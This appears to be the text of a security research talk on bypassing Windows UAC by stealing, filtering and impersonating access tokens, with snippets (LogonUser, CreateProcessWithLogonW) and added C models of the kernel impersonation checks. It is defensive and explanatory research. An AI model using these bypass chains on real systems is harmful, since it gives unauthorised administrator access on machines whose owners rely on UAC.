
Reading your way around UAC
Abusing Access Tokens for UAC Bypasses

James Forshaw @tiraniddo


What I’m Going to Talk About
● Why Admin-Approval UAC is even worse than you thought!
● Why Over-the-Shoulder UAC is still worse than you thought!
UAC Architecture

[Diagram, built up over four slides: a Limited User Logon Session (Authentication-ID = A-B) and an Elevated User Logon Session (Authentication-ID = X-Y). An Application in the limited session calls ShellExecute "runas"; the request goes over RPC to the AppInfo Service, which shows consent.exe and then starts the elevated Application inside the elevated logon session.]
Linked Tokens

[Diagram: the limited token and the elevated token are linked to each other. Compared with the elevated token, the limited token has its administrator groups marked Deny-Only and also has fewer privileges.]
The Problem with UAC

[Diagram: the Non-Admin Application (Limited User Logon Session, Authentication-ID = A-B) and the Admin Application (Elevated User Logon Session, Authentication-ID = X-Y) share the same Current User Registry Hive, the same User Profile Directory, and the same Desktop and Kernel Objects.]
[Diagram: a Kernel Object is secured by the Login SID. That Login SID appears both in the Non-Admin Token's groups and in the Admin Token's DACL, so the two logon sessions are tied together by it.]
NtUserGetClipboardToken

[Diagram, three steps: (1) the UAC Admin Process writes to the clipboard and Win32k, in the kernel, captures the writer's token; (2) the Non-Admin Process calls NtUserGetClipboardToken; (3) Win32k hands back the Captured Token, opened for read.]

Clipboard Token: read-only access
Creating a New Process

[Diagram: a token may be assigned as the primary token of a new process in two cases. Parent Token: the Assigned Token's Parent Token ID equals the Process Token's Token ID (the assigned token is a child of the process token). Sibling Token: the Assigned Token's Parent Token ID equals the Process Token's Parent Token ID AND the two Auth IDs are equal. Otherwise the assignment is refused.]
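The assignment rule from the diagram above, as an added example (not from the slides and not Windows source): a portable C model with illustrative field names. It shows why a token stolen from the elevated session X-Y cannot simply be handed to CreateProcessAsUser from the limited session A-B: it is neither a child nor a sibling of the caller's token. The sample tokens are constructed for the example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Illustrative token fields (this example's names, not the kernel's). */
typedef struct {
    uint64_t token_id;         /* unique ID of this token object */
    uint64_t parent_token_id;  /* TokenId of the token it was duplicated from */
    uint64_t auth_id;          /* logon session: the Authentication-ID */
} token_t;

/* Can `assigned` become the primary token of a process created by a process
 * whose primary token is `proc`? Only a child or a sibling qualifies. */
bool can_assign_primary_token(const token_t *proc, const token_t *assigned) {
    /* Parent Token case: the new token was duplicated from the process token. */
    if (assigned->parent_token_id == proc->token_id)
        return true;
    /* Sibling Token case: same Parent Token ID AND same Auth ID. */
    if (assigned->parent_token_id == proc->parent_token_id &&
        assigned->auth_id == proc->auth_id)
        return true;
    return false;
}

/* Constructed sample tokens; 0xAB stands for session A-B, 0x5859 for X-Y. */
const token_t limited_proc   = { 100, 10, 0xAB };   /* our Medium IL process */
const token_t own_duplicate  = { 101, 100, 0xAB };  /* DuplicateTokenEx of our own token */
const token_t sibling_same   = { 102, 10, 0xAB };   /* another process from the same parent */
const token_t stolen_admin   = { 200, 20, 0x5859 }; /* elevated token from session X-Y */
const token_t forged_sibling = { 201, 10, 0x5859 }; /* same parent, wrong logon session */

int main(void) {
    printf("own duplicate : %d\n", can_assign_primary_token(&limited_proc, &own_duplicate));
    printf("sibling       : %d\n", can_assign_primary_token(&limited_proc, &sibling_same));
    printf("stolen admin  : %d\n", can_assign_primary_token(&limited_proc, &stolen_admin));
    printf("forged sibling: %d\n", can_assign_primary_token(&limited_proc, &forged_sibling));
    return 0;
}
```

Not on the slide, but worth knowing when reading the model: the kernel only applies this parent/sibling test to callers without SeAssignPrimaryTokenPrivilege, which a Medium IL token does not hold.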
Impersonating a Token

[Diagram, built up over several slides: impersonation is ALLOWED if the Token Level == Identification, OR the Process has SeImpersonatePrivilege, OR (Process IL >= Token IL AND Process User == Token User). Otherwise the token is restricted to Identification level. When the only failing condition is Process IL < Token IL, the fix is to reduce the token's Integrity Level first, after which the same check passes.]
High IL != Administrator

● Create and modify files in system locations
● Create and modify system services
● Open >= High IL processes for R/W
● Interact with >= High IL windows (UIPI)

No “God” Privileges
The following are not allowed to be enabled for a Medium IL token.
Privilege Possible Privileged Operations
SeCreateTokenPrivilege Create new token objects
SeTcbPrivilege Many and varied privileged operations
SeLoadDriverPrivilege Load a driver into the kernel
SeDebugPrivilege Bypass process/thread security checks
SeBackupPrivilege Bypass file/key security checks for read
SeRestorePrivilege Bypass file/key security checks for write
SeImpersonatePrivilege Impersonate arbitrary users
Stealing Tokens

OpenProcessToken on the elevated process: we only have Query access, which gives limited information.

Only Limited Information?

Start an Elevated Process?
● Standard auto-elevation of specific MS binaries.
● Scheduled Tasks: [screenshot of the task setting] if set, the task will spawn an elevated process with no UAC prompt.
DEMO
Changes in Windows 10

[Diagram: the impersonation decision gains two new checks. An Elevation Check is applied up front, and a Capability Check joins the Process IL >= Token IL / Process User == Token User path. The other routes (Token Level == Identification, Process has SeImpersonatePrivilege) remain; otherwise restrict to Identification level.]

Elevation Checks

if (SeTokenIsElevated(ImpersonationToken)) {
  if (!SeTokenIsElevated(ProcessToken) ||
      ProcessToken->LogonSession->Flags.UacSession) {
    return STATUS_PRIVILEGE_NOT_HELD;
  }
}
// Continue with impersonation check.
What Makes a Token Elevated?

● Has "God" privileges or certain elevated groups

BOOLEAN RtlIsElevatedRid(SID_AND_ATTRIBUTES *sid_and_attr) {
  DWORD last_rid = GetLastRid(sid_and_attr->Sid);
  DWORD check_rids[] = { 512, 544, ... };
  for (int i = 0; i < countof(check_rids); ++i) {
    if (check_rids[i] == last_rid) {
      return TRUE;
    }
  }
  return FALSE;
}

For example: BUILTIN\Administrators == S-1-5-32-544
Use NtFilterToken
Use Non-God Privileges
Privilege Possible Privileged Operations
SeCreateGlobalPrivilege Create new sections in global BNO directory
SeCreatePageFilePrivilege Create or modify page/hibernation files
SeCreateSymbolicLinkPrivilege Create arbitrary NTFS symbolic links
SeManageVolumePrivilege Mount/Unmount volumes including VHDs
SeSecurityPrivilege Modify SACL entries
SeSystemEnvironmentPrivilege Modify UEFI boot variables
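The impersonation rules, the Windows 10 elevation check, the RtlIsElevatedRid group test and the two workarounds the slides give (reduce the Integrity Level; filter the token with NtFilterToken and live on non-God privileges) combined into one added example. This is a portable C model written for this page, not Windows source: the structures, function names and the two "God"/"non-God" privilege sets are this example's, the RID list is limited to the two values the slide names, and the sample tokens are constructed. It walks a Medium IL UAC-limited process trying to impersonate a High IL token stolen from the same user's elevated session.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define MAX_ITEMS 8

/* Integrity levels as the RID of the S-1-16-<rid> label SID. */
enum il { IL_MEDIUM = 0x2000, IL_HIGH = 0x3000 };

/* Privileges; everything before GOD_PRIV_COUNT is a "God" privilege from the slide table. */
enum priv { SE_CREATE_TOKEN, SE_TCB, SE_LOAD_DRIVER, SE_DEBUG, SE_BACKUP,
            SE_RESTORE, SE_IMPERSONATE, GOD_PRIV_COUNT,
            SE_CREATE_SYMBOLIC_LINK, SE_CHANGE_NOTIFY };

typedef struct { const char *sid; bool deny_only; } group_t;

typedef struct {
    const char *user_sid;
    int il;
    bool identification_level;   /* SecurityIdentification impersonation token */
    bool uac_session;            /* LogonSession->Flags.UacSession */
    group_t groups[MAX_ITEMS]; size_t ngroups;
    enum priv privs[MAX_ITEMS];  size_t nprivs;
} token_t;

typedef enum { IMPERSONATE_OK, RESTRICT_TO_IDENTIFICATION, PRIVILEGE_NOT_HELD } imp_result;

/* Last sub-authority of a textual SID: 544 for "S-1-5-32-544". */
unsigned long last_rid(const char *sid) {
    const char *dash = strrchr(sid, '-');
    return dash ? strtoul(dash + 1, NULL, 10) : 0;
}

/* RtlIsElevatedRid model; the slide names 512 and 544 and elides the rest. */
bool is_elevated_rid(const char *sid) {
    static const unsigned long check_rids[] = { 512, 544 };
    unsigned long rid = last_rid(sid);
    for (size_t i = 0; i < sizeof check_rids / sizeof check_rids[0]; i++)
        if (check_rids[i] == rid) return true;
    return false;
}

bool has_priv(const token_t *t, enum priv p) {
    for (size_t i = 0; i < t->nprivs; i++) if (t->privs[i] == p) return true;
    return false;
}

/* SeTokenIsElevated model: any "God" privilege, or an elevated group that is not deny-only. */
bool token_is_elevated(const token_t *t) {
    for (int p = 0; p < GOD_PRIV_COUNT; p++) if (has_priv(t, (enum priv)p)) return true;
    for (size_t i = 0; i < t->ngroups; i++)
        if (!t->groups[i].deny_only && is_elevated_rid(t->groups[i].sid)) return true;
    return false;
}

/* SeTokenCanImpersonate model in the slide's order: Windows 10 elevation check first,
 * then Identification level, SeImpersonatePrivilege, and finally IL plus user match. */
imp_result can_impersonate(const token_t *proc, const token_t *imp, bool windows10) {
    if (windows10 && token_is_elevated(imp) &&
        (!token_is_elevated(proc) || proc->uac_session))
        return PRIVILEGE_NOT_HELD;
    if (imp->identification_level) return IMPERSONATE_OK;
    if (has_priv(proc, SE_IMPERSONATE)) return IMPERSONATE_OK;
    if (proc->il >= imp->il && strcmp(proc->user_sid, imp->user_sid) == 0)
        return IMPERSONATE_OK;
    return RESTRICT_TO_IDENTIFICATION;
}

/* Workaround 1 ("Reduce the Integrity Level"): lowering a token's IL needs no privilege. */
void lower_il(token_t *t, int il) { if (il < t->il) t->il = il; }

/* Workaround 2 ("Use NtFilterToken"): elevated groups become deny-only and God privileges
 * are dropped, so the result is no longer "elevated"; non-God privileges survive. */
token_t filter_token(const token_t *t) {
    token_t f = *t;
    for (size_t i = 0; i < f.ngroups; i++)
        if (is_elevated_rid(f.groups[i].sid)) f.groups[i].deny_only = true;
    f.nprivs = 0;
    for (size_t i = 0; i < t->nprivs; i++)
        if (t->privs[i] > GOD_PRIV_COUNT) f.privs[f.nprivs++] = t->privs[i];
    return f;
}

/* Constructed sample: the Medium IL UAC-limited process token (session A-B). */
token_t limited_process_token(void) {
    token_t t = {0};
    t.user_sid = "S-1-5-21-1-2-3-1001"; t.il = IL_MEDIUM; t.uac_session = true;
    t.groups[t.ngroups++] = (group_t){ "S-1-5-32-545", false }; /* BUILTIN\Users */
    t.groups[t.ngroups++] = (group_t){ "S-1-5-32-544", true };  /* Administrators, deny-only */
    t.privs[t.nprivs++] = SE_CHANGE_NOTIFY;
    return t;
}

/* Constructed sample: High IL admin token stolen from the same user's elevated session (X-Y). */
token_t stolen_admin_token(void) {
    token_t t = {0};
    t.user_sid = "S-1-5-21-1-2-3-1001"; t.il = IL_HIGH;
    t.groups[t.ngroups++] = (group_t){ "S-1-5-32-544", false }; /* BUILTIN\Administrators */
    t.privs[t.nprivs++] = SE_DEBUG;
    t.privs[t.nprivs++] = SE_CREATE_SYMBOLIC_LINK;
    return t;
}
```

Walking the model: before Windows 10 the stolen High IL token is only restricted because of the IL comparison, so lowering it to Medium makes impersonation succeed with the admin group and SeDebugPrivilege intact. On Windows 10 the elevation check refuses that, because the impersonation token is elevated while the caller's logon session is a UAC session; filtering the token removes what makes it "elevated", impersonation is allowed again, and SeCreateSymbolicLinkPrivilege is still there to use.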
Bouncing to Elevated Session

[Diagram: the Limited User Logon Session (Authentication-ID = A-B, Flags = UacSession) and the Elevated User Logon Session (Authentication-ID = X-Y, Flags = None). The Application in the limited session impersonates a Non-Admin Token and uses WMI Win32_Process to create a Non-Admin Application; that new process runs in the elevated logon session, whose flags are None, so from there impersonating the Admin Token passes the elevation check.]
DEMO
LogonUser New Credentials

[Diagram: the Application impersonates a Non-Elevated Token and calls LogonUser with LOGON32_LOGON_NEW_CREDENTIALS. LSASS clones the token into a new logon session (Authentication-ID = X-Y); applied to the Admin Token, the clone comes back as an Elevated Token.]

// Clone token with new credentials.
HANDLE Token;
LogonUser("Badger", "Badger", "Badger",
          LOGON32_LOGON_NEW_CREDENTIALS,
          LOGON32_PROVIDER_WINNT50,
          &Token);
Abuse Secondary Logon

ImpersonateLoggedOnUser(hNonElevatedToken);

// LOGON_NETCREDENTIALS_ONLY is equivalent to LOGON32_LOGON_NEW_CREDENTIALS.
STARTUPINFOW startup_info = { sizeof(startup_info) };
PROCESS_INFORMATION proc_info;
CreateProcessWithLogonW(L"Badger", L"Badger", L"Badger",
                        LOGON_NETCREDENTIALS_ONLY,
                        NULL, L"cmd.exe",
                        0, NULL, NULL,
                        &startup_info, &proc_info);
DEMO
Over-The-Shoulder Elevation

Separation of Resources

[Diagram: the Normal User Logon Session (Authentication-ID = A-B) runs the Non-Admin Application with the Normal User Registry Hive and User Profile Directory; the Elevated User Logon Session (Authentication-ID = X-Y) runs the Admin Application with the Admin User Registry Hive and Admin Profile Directory. Only the Desktop and Kernel Objects are shared between the two.]
Impersonating an OTS Token

[Diagram: the same decision as before: ALLOWED if Token Level == Identification, OR Process has SeImpersonatePrivilege, OR (Process IL >= Token IL AND Process User == Token User). With an OTS token the Process User and Token User differ, so on Windows 10 the new Capability Check is the only remaining way onto the IL/user path; otherwise restrict to Identification level.]
Capability Check

BOOLEAN SepIsImpersonationAllowedDueToCapability(PTOKEN token, PTOKEN imp_token) {
  // Tokens must be in the same Session and both be LowBox.
  if ((token->SessionId != imp_token->SessionId) ||
      ((token->TokenFlags & TOKEN_FLAGS_LOWBOX) == 0) ||
      ((imp_token->TokenFlags & TOKEN_FLAGS_LOWBOX) == 0)) {
    return FALSE;
  }

  // Process token must have the constrained impersonation capability,
  // hold all of the impersonation token's capabilities, and be in the same package.
  if (!SepSidInTokenSidHash(&token->CapabilitiesHash,
                            SeConstrainedImpersonationCapabilitySid) ||
      !SepCheckCapabilities(token, imp_token->Capabilities) ||
      !RtlEqualSid(token->Package, imp_token->Package)) {
    return FALSE;
  }

  return TRUE;
}
Enterprise Authentication
DEMO
Is Anything Safe?

Hit CTRL+ALT+DEL and click the switch-user option (screenshot not reproduced here).
Conclusions
● Admin-Approval UAC is broken
● Over-the-shoulder UAC is pretty broken on Windows 10
● Best chance you have is fast-user switching
○ Don’t switch using Explorer, always use the secure attention sequence
Thanks
Any Questions?
